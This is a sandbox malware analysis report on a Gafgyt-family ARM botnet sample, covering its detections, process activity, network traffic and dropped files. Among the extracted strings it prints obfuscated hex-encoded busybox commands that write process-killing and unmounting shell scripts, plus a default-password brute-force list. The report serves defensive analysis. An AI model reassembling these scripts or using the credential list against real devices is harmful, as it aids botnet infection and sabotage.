Edit tour

Linux Analysis Report
arm6.elf

Overview

General Information

Sample name:arm6.elf
Analysis ID:1654250
MD5:64888b10ebb99e76fbe6e824775275f9
SHA1:5455ce92af7774d0a22618eba4d4bb01fc1ee713
SHA256:260f2b3a065c109d606f751b30be701413826d929f71176b39d603ffb37dbed4
Tags:elfuser-abuse_ch
Infos:

Detection

Score:48
Range:0 - 100

Signatures

Multi AV Scanner detection for submitted file
Enumerates processes within the "proc" file system
Executes the "rm" command used to delete files or directories
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample contains strings indicative of password brute-forcing capabilities
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
Joe Sandbox version:42.0.0 Malachite
Analysis ID:1654250
Start date and time:2025-04-02 07:42:20 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 4m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:arm6.elf
Detection:MAL
Classification:mal48.linELF@0/4@2/0
Command:/tmp/arm6.elf
PID:5432
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
For God so loved the world
Standard Error:
  • system is lnxubuntu20
  • arm6.elf (PID: 5432, Parent: 5355, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/arm6.elf
    • arm6.elf New Fork (PID: 5459, Parent: 5432)
  • dash New Fork (PID: 5436, Parent: 3587)
  • rm (PID: 5436, Parent: 3587, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.bnEpNvlWmP /tmp/tmp.iVnar8LVj9 /tmp/tmp.IOGgSWDU3S
  • dash New Fork (PID: 5437, Parent: 3587)
  • rm (PID: 5437, Parent: 3587, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -f /tmp/tmp.bnEpNvlWmP /tmp/tmp.iVnar8LVj9 /tmp/tmp.IOGgSWDU3S
  • cleanup
No yara matches
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: arm6.elfVirustotal: Detection: 42%Perma Link
Source: arm6.elfReversingLabs: Detection: 41%
Source: /tmp/arm6.elf (PID: 5459)Socket: 127.0.0.1:22448Jump to behavior
Source: global trafficTCP traffic: 192.168.2.13:57218 -> 54.247.62.1:443
Source: unknownTCP traffic detected without corresponding DNS query: 54.247.62.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: daisy.ubuntu.com
Source: unknownNetwork traffic detected: HTTP traffic on port 57218 -> 443
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x77\x68\x69\x6c\x65\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x3b\x20\x64\x6f\x20\x6d\x70\x3d\x24\x28\x65\x63\x68\x6f\x20\x22\x24" > kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6c\x22\x20\x7c\x20\x61\x77\x6b\x20\x27\x7b\x70\x72\x69\x6e\x74\x20\x24\x32\x7d\x27\x20\x7c\x20\x73\x65\x64\x20\x27\x73\x2f\x5c" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5c\x30\x34\x30\x2f\x20\x2f\x67\x27\x29\x3b\x20\x63\x61\x73\x65\x20\x22\x24\x6d\x70\x22\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x5b\x30\x2d\x39\x5d\x2a\x29\x20\x70\x69\x64\x3d\x24\x7b\x6d\x70\x23\x2f\x70\x72\x6f\x63\x2f\x7d\x3b\x20\x5b\x20\x2d\x64\x20\x22" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x2f\x70\x72\x6f\x63\x2f\x24\x70\x69\x64\x22\x20\x5d\x20\x26\x26\x20\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x22\x20" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x26\x26\x20\x75\x6d\x6f\x75\x6e\x74\x20\x22\x24\x6d\x70\x22\x20\x32\x3e\x2f\x64" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x2f\x70\x72\x6f\x63\x2f\x6d\x6f\x75" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x74\x73" >> kmount
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6e\x75\x6d\x3d\x22\x24\x7b\x70\x69\x64\x23\x23\x2a\x2f\x7d\x22\x3b\x20\x69\x66\x20\x5b\x20\x2d\x72\x20\x22\x24\x70\x69\x64\x2f" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6d\x61\x70\x73\x22\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x74\x72\x75\x65\x3b\x20\x77" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x68\x69\x6c\x65\x20\x49\x46\x53\x3d\x20\x72\x65\x61\x64\x20\x2d\x72\x20\x6c\x69\x6e\x65\x3b\x20\x64\x6f\x20\x63\x61\x73\x65\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x22\x24\x6c\x69\x6e\x65\x22\x20\x69\x6e\x20\x2a\x22\x2f\x6c\x69\x62\x2f\x22\x2a\x7c\x2a\x22\x2f\x6c\x69\x62\x36\x34\x2f\x22\x2a" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x7c\x2a\x22\x2e\x73\x6f\x22\x2a\x29\x20\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x3d\x66\x61\x6c\x73\x65\x3b\x20\x62\x72\x65\x61" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x3b\x3b\x20\x65\x73\x61\x63\x3b\x20\x64\x6f\x6e\x65\x20\x3c\x20\x22\x24\x70\x69\x64\x2f\x6d\x61\x70\x73\x22\x3b\x20\x69\x66" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x20\x5b\x20\x22\x24\x73\x75\x73\x70\x69\x63\x69\x6f\x75\x73\x22\x20\x3d\x20\x74\x72\x75\x65\x20\x5d\x3b\x20\x74\x68\x65\x6e\x20" >> swan
Source: Initial sampleString containing 'busybox' found: /bin/busybox echo -ne "\x6b\x69\x6c\x6c\x20\x2d\x39\x20\x22\x24\x70\x69\x64\x5f\x6e\x75\x6d\x22\x3b\x20\x66\x69\x3b\x20\x66\x69\x3b\x20\x64\x6f\x6e\x65" >> swan
Source: Initial sampleString containing 'busybox' found: sh kmount/bin/busybox echo -ne "\x66\x6f\x72\x20\x70\x69\x64\x20\x69\x6e\x20\x2f\x70\x72\x6f\x63\x2f\x5b\x30\x2d\x39\x5d\x2a\x3b\x20\x64\x6f\x20\x70\x69\x64\x5f" > swan
Source: Initial sampleString containing potential weak password found: 12345
Source: Initial sampleString containing potential weak password found: 54321
Source: Initial sampleString containing potential weak password found: 654321
Source: Initial sampleString containing potential weak password found: admin1234
Source: Initial sampleString containing potential weak password found: administrator
Source: Initial sampleString containing potential weak password found: supervisor
Source: Initial sampleString containing potential weak password found: password
Source: Initial sampleString containing potential weak password found: default
Source: Initial sampleString containing potential weak password found: guest
Source: Initial sampleString containing potential weak password found: service
Source: Initial sampleString containing potential weak password found: support
Source: ELF static info symbol of initial sample.symtab present: no
Source: /tmp/arm6.elf (PID: 5432)SIGKILL sent: pid: 3688, result: successfulJump to behavior
Source: classification engineClassification label: mal48.linELF@0/4@2/0
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/236/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/237/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/238/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/239/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/5379/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/914/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/914/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/10/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/917/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/917/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/11/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/12/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/13/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/5274/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/5274/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/5274/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/14/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/15/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/16/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/17/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/18/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/19/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/240/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/3095/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/3095/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/120/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/241/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/121/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/242/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/1/mapsJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/1/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/122/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/243/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/2/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/123/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/244/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/3/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/124/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/245/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/1588/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/1588/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/125/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/4/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/246/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/126/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/5/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/247/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/127/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/6/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/248/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/128/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/7/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/249/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/129/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/8/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/800/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/9/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/1906/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/1906/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/802/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/802/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/3643/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/3643/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/3643/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/803/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/803/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/803/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/20/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/21/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/22/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/23/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/24/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/25/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/26/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/27/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/28/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/29/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/3420/cmdlineJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/3420/fdJump to behavior
Source: /tmp/arm6.elf (PID: 5432)File opened: /proc/3420/cmdlineJump to behavior
Source: /usr/bin/dash (PID: 5436)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.bnEpNvlWmP /tmp/tmp.iVnar8LVj9 /tmp/tmp.IOGgSWDU3SJump to behavior
Source: /usr/bin/dash (PID: 5437)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.bnEpNvlWmP /tmp/tmp.iVnar8LVj9 /tmp/tmp.IOGgSWDU3SJump to behavior
Source: /tmp/arm6.elf (PID: 5432)Queries kernel information via 'uname': Jump to behavior
Source: arm6.elf, 5459.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmpBinary or memory string: lUqemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm6.elf, 5432.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmpBinary or memory string: lU/tmp/qemu-open.VspajY:5v
Source: arm6.elf, 5459.1.00007f1674039000.00007f1674040000.rw-.sdmpBinary or memory string: vmware
Source: arm6.elf, 5432.1.0000556cd2fa7000.0000556cd30f6000.rw-.sdmp, arm6.elf, 5459.1.0000556cd2fa7000.0000556cd30f6000.rw-.sdmpBinary or memory string: lU!/etc/qemu-binfmt/arm
Source: arm6.elf, 5432.1.00007f1674039000.00007f1674040000.rw-.sdmp, arm6.elf, 5459.1.00007f1674039000.00007f1674040000.rw-.sdmpBinary or memory string: qemu-arm
Source: arm6.elf, 5432.1.0000556cd2fa7000.0000556cd30f6000.rw-.sdmp, arm6.elf, 5459.1.0000556cd2fa7000.0000556cd30f6000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
Source: arm6.elf, 5432.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmp, arm6.elf, 5459.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
Source: arm6.elf, 5432.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmpBinary or memory string: /tmp/qemu-open.VspajY
Source: arm6.elf, 5432.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmp, arm6.elf, 5459.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/arm6.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/arm6.elf
Source: arm6.elf, 5459.1.00007ffc0dc7e000.00007ffc0dc9f000.rw-.sdmpBinary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: arm6.elf, 5432.1.00007f1674039000.00007f1674040000.rw-.sdmp, arm6.elf, 5459.1.00007f1674039000.00007f1674040000.rw-.sdmpBinary or memory string: !!a1gAWFxuAXsFWUgBRQAA!!a1gAWFxuAXsAWUgKRXgA!!a1gAWFxuAXsAWEgJR3IA!!a10CWFxuAHsGWVcWQHAA!!a10CWFxuAHsGWVcWQHUA!!aFwAWF9uA3sGW0gLRgAA!!aFwAWFlpG2QBW0gJTwAA!!qemu-arm2QBW0gJTwAA!
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath InterceptionPath Interception1
File Deletion
1
OS Credential Dumping
11
Security Software Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkit1
Brute Force
Application Window DiscoveryRemote Desktop ProtocolData from Removable Media1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive2
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
No configs have been found
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1654250 Sample: arm6.elf Startdate: 02/04/2025 Architecture: LINUX Score: 48 15 54.247.62.1, 443 AMAZON-02US United States 2->15 17 daisy.ubuntu.com 2->17 19 Multi AV Scanner detection for submitted file 2->19 7 arm6.elf 2->7         started        9 dash rm 2->9         started        11 dash rm 2->11         started        signatures3 process4 process5 13 arm6.elf 7->13         started       
SourceDetectionScannerLabelLink
arm6.elf42%VirustotalBrowse
arm6.elf42%ReversingLabsLinux.Backdoor.Gafgyt
No Antivirus matches
No Antivirus matches
No Antivirus matches

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
daisy.ubuntu.com
162.213.35.25
truefalse
    high
    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs
    IPDomainCountryFlagASNASN NameMalicious
    54.247.62.1
    unknownUnited States
    16509AMAZON-02USfalse
    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
    54.247.62.1na.elfGet hashmaliciousPrometeiBrowse
      jfeeps.elfGet hashmaliciousUnknownBrowse
        arm.elfGet hashmaliciousUnknownBrowse
          na.elfGet hashmaliciousPrometeiBrowse
            parm6.elfGet hashmaliciousMiraiBrowse
              rjfe686.elfGet hashmaliciousUnknownBrowse
                na.elfGet hashmaliciousPrometeiBrowse
                  sh4.elfGet hashmaliciousMiraiBrowse
                    na.elfGet hashmaliciousPrometeiBrowse
                      na.elfGet hashmaliciousPrometeiBrowse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        daisy.ubuntu.comrjfe686.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.25
                        arm.elfGet hashmaliciousMiraiBrowse
                        • 162.213.35.25
                        efefa7.elfGet hashmaliciousMiraiBrowse
                        • 162.213.35.24
                        arm7.elfGet hashmaliciousMiraiBrowse
                        • 162.213.35.24
                        weje64.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.25
                        na.elfGet hashmaliciousPrometeiBrowse
                        • 162.213.35.24
                        drea4.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.24
                        bejv86.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.25
                        efea6.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.25
                        FederalAgent.arm5.elfGet hashmaliciousUnknownBrowse
                        • 162.213.35.25
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        AMAZON-02USfull folder details request quotation.exeGet hashmaliciousFormBookBrowse
                        • 13.248.169.48
                        na.elfGet hashmaliciousPrometeiBrowse
                        • 54.247.62.1
                        Payment Remittance.pdfGet hashmaliciousUnknownBrowse
                        • 3.168.73.96
                        OC-8563 PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                        • 13.248.169.48
                        SHIPPING DOCUMENT.exeGet hashmaliciousFormBookBrowse
                        • 13.248.169.48
                        vejfa5.elfGet hashmaliciousUnknownBrowse
                        • 34.243.160.129
                        efefa7.elfGet hashmaliciousMiraiBrowse
                        • 34.249.145.219
                        jfeeps.elfGet hashmaliciousUnknownBrowse
                        • 54.247.62.1
                        Payment Copy.exeGet hashmaliciousFormBookBrowse
                        • 13.248.169.48
                        vjwe68k.elfGet hashmaliciousUnknownBrowse
                        • 34.254.182.186
                        No context
                        No context
                        Process:/tmp/arm6.elf
                        File Type:data
                        Category:dropped
                        Size (bytes):14
                        Entropy (8bit):3.521640636343319
                        Encrypted:false
                        SSDEEP:3:Tgj03:Tgw3
                        MD5:3F57B2990E079DDED19A289B2C2D9845
                        SHA1:EC529CD92FCD1419E74F69269A1FBDFB901F3360
                        SHA-256:42BAD665C8A094C4820D587524D2B0F1E1AA45E1BA9BCE12E59A92CBA93B90BC
                        SHA-512:B2E54540954546CA0BDC2B73923B545659131AB088282E7070B2A7C9FBA1D1C1D58CFE4094D1DAE38D578E2B4FD7CB2E3A7D25A06EE84546207EE6A3B19553A8
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:/tmp/arm6.elf.
                        Process:/tmp/arm6.elf
                        File Type:ASCII text
                        Category:dropped
                        Size (bytes):355
                        Entropy (8bit):3.8422285464965658
                        Encrypted:false
                        SSDEEP:6:M6gceFXNSD/VUk/FYceFXN6UPj/V/3VVyAb/rVmsVot/VOArB/VH:39eiSMFePFVIAbyl
                        MD5:E180F404AD20779607CE6A6E5ECD4353
                        SHA1:107BA7355A598874556B95B42B748D08FA7FA52D
                        SHA-256:AB355E0DD96CEEB4CB21B2B86C99481216C508E2499F283558677C2DD2FAE80A
                        SHA-512:CABB3D8913AAC5E734D9D98DA561D44C5089D40754D3F786F8F8FF130237958C1FCD5812BFCA3F0BAE905E6421B9ACAD311BB9AD17D74D0CE01B6ABA6749F967
                        Malicious:false
                        Reputation:low
                        Preview:8000-22000 r-xp 00000000 fd:00 531567 /tmp/arm6.elf.29000-2a000 rw-p 00019000 fd:00 531567 /tmp/arm6.elf.2a000-31000 rw-p 00000000 00:00 0 .ff7ee000-ff7ef000 r--p 00000000 fd:00 793309 /usr/lib/x86_64-linux-gnu/libm-2.31.so.ff7ef000-ff7f0000 ---p 00000000 00:00 0 .ff7f0000-ffff0000 rw-p 00000000 00:00 0 [stack].
                        Process:/tmp/arm6.elf
                        File Type:data
                        Category:dropped
                        Size (bytes):14
                        Entropy (8bit):3.521640636343319
                        Encrypted:false
                        SSDEEP:3:Tgj03:Tgw3
                        MD5:3F57B2990E079DDED19A289B2C2D9845
                        SHA1:EC529CD92FCD1419E74F69269A1FBDFB901F3360
                        SHA-256:42BAD665C8A094C4820D587524D2B0F1E1AA45E1BA9BCE12E59A92CBA93B90BC
                        SHA-512:B2E54540954546CA0BDC2B73923B545659131AB088282E7070B2A7C9FBA1D1C1D58CFE4094D1DAE38D578E2B4FD7CB2E3A7D25A06EE84546207EE6A3B19553A8
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:/tmp/arm6.elf.
                        Process:/tmp/arm6.elf
                        File Type:data
                        Category:dropped
                        Size (bytes):14
                        Entropy (8bit):3.521640636343319
                        Encrypted:false
                        SSDEEP:3:Tgj03:Tgw3
                        MD5:3F57B2990E079DDED19A289B2C2D9845
                        SHA1:EC529CD92FCD1419E74F69269A1FBDFB901F3360
                        SHA-256:42BAD665C8A094C4820D587524D2B0F1E1AA45E1BA9BCE12E59A92CBA93B90BC
                        SHA-512:B2E54540954546CA0BDC2B73923B545659131AB088282E7070B2A7C9FBA1D1C1D58CFE4094D1DAE38D578E2B4FD7CB2E3A7D25A06EE84546207EE6A3B19553A8
                        Malicious:false
                        Reputation:moderate, very likely benign file
                        Preview:/tmp/arm6.elf.
                        File type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), dynamically linked, stripped
                        Entropy (8bit):6.207888986702945
                        TrID:
                        • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                        File name:arm6.elf
                        File size:104'536 bytes
                        MD5:64888b10ebb99e76fbe6e824775275f9
                        SHA1:5455ce92af7774d0a22618eba4d4bb01fc1ee713
                        SHA256:260f2b3a065c109d606f751b30be701413826d929f71176b39d603ffb37dbed4
